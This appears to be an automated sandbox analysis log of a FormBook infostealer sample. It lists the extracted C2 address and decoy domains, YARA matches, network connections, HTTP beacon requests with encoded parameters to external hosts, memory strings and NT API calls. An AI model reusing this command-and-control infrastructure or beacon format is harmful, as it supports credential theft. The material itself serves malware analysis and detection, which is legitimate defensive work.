{"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]}
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.simpeltattofor.men/mjyv/"], "decoy": ["wenyuexuan.com", "tropicaldepression.info", "healthylifefit.com", "reemletenleafy.com", "jmrrve.com", "mabduh.com", "esomvw.com", "selfcaresereneneness.com", "murdabudz.com", "meinemail.online", "brandqrcodes.com", "live-in-pflege.com", "nickrecovery.com", "ziototoristorante.com", "chatcure.com", "corlora.com", "localagentlab.com", "yogo7.net", "krveop.com", "heianswer.xyz", "idproslot.xyz", "anielleharris.com", "lebonaharchitects.com", "chilestew.com", "ventasdecasasylotes.xyz", "welcome-sber.store", "ahmedintisher.com", "pastlinks.com", "productprinting.online", "babybox.media", "volteraenergy.net", "chinatowndeliver.com", "behiscalm.com", "totalselfconfidence.net", "single-on-purpose.com", "miyonbuilding.com", "medicalmanagementinc.info", "bellaalubo.com", "dubaibiologicdentist.com", "jspagnier-graveur.com", "deskbk.com", "thehauntdepot.com", "5fbuy.com", "calmingscience.com", "luvnecklace.com", "noun-bug.com", "mysenarai.com", "socialmediaplugin.com", "livinglovinglincoln.com", "vaxfreeschool.com", "bjjinmei.com", "p60p.com", "upgradepklohb.xyz", "georges-lego.com", "lkkogltoyof4.xyz", "fryhealty.com", "peacetransformationpath.com", "lightfootsteps.com", "recreativemysteriousgift.com", "luminoza.website", "mccorklehometeam.com", "car-insurance-rates-x2.info", "serpasboutiquedecarnes.com", "1971event.com"]} |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\explorer.exe | Network Connect: 108.179.246.105 80 |
Source: C:\Windows\explorer.exe | Domain query: www.corlora.com |
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80 |
Source: C:\Windows\explorer.exe | Domain query: www.thehauntdepot.com |
Source: C:\Windows\explorer.exe | Domain query: www.bellaalubo.com |
Source: C:\Windows\explorer.exe | Domain query: www.pastlinks.com |
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80 |
Source: C:\Windows\explorer.exe | Network Connect: 54.85.93.188 80 |
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80 |
Source: C:\Windows\explorer.exe | Domain query: www.jspagnier-graveur.com |
Source: C:\Windows\explorer.exe | Domain query: www.behiscalm.com |
Source: C:\Windows\explorer.exe | Domain query: www.productprinting.online |
Source: C:\Windows\explorer.exe | Domain query: www.miyonbuilding.com |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/ |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: http://statcounter.com/ |
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/bg.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif) |
Source: wscript.exe, 00000009.00000002.611994282.00000000058B2000.00000004.00020000.sdmp | String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png) |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1Host: www.bellaalubo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.behiscalm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1Host: www.productprinting.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1Host: www.corlora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.jspagnier-graveur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1Host: www.chinatowndeliver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 3.2.UaTmOE6yP9.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 3.2.UaTmOE6yP9.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_008E275D |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01792060 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01796080 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017947A0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01796620 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01792A48 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01797080 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017954E8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017919D0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_017941A8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01794E00 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_0179B1E8 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01793040 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_0179B808 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_01793BC0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_00911D21 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 0_2_008E6458 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00401030 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041C970 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041B9BF |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041D294 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041CBD1 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00408C80 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041CC9E |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402D88 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402D90 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00402FB0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_008E275D |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00911D21 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_008E6458 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05220D20 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05244120 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0522F900 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2D07 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F1D55 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05252581 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523D5E0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052E1002 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523841F |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052520A0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F20A8 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0523B090 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2B28 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0525EBB0 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F1FF1 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05246E30 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F22AE |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052F2EF7 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDB9BF |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDC970 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDD294 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDCBD1 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DDCC9E |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC8C80 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2D90 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2D88 |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DC2FB0 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004185E0 NtCreateFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00418690 NtReadFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_00418710 NtClose, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004187C0 NtAllocateVirtualMemory, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_004185DA NtCreateFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041868A NtReadFile, |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Code function: 3_2_0041868C NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269910 NtAdjustPrivilegesToken,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269540 NtReadFile,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052699A0 NtCreateSection,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052695D0 NtClose,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269860 NtQuerySystemInformation,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269840 NtDelayExecution,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269710 NtQueryInformationToken,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269780 NtMapViewOfSection,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269FE0 NtCreateMutant,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269660 NtAllocateVirtualMemory,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269650 NtQueryValueKey,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A50 NtCreateFile,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052696E0 NtFreeVirtualMemory,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052696D0 NtCreateKey,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269520 NtWaitForSingleObject, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526AD30 NtSetContextThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269560 NtWriteFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269950 NtQueueApcThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052695F0 NtQueryInformationFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052699D0 NtCreateProcessEx, |
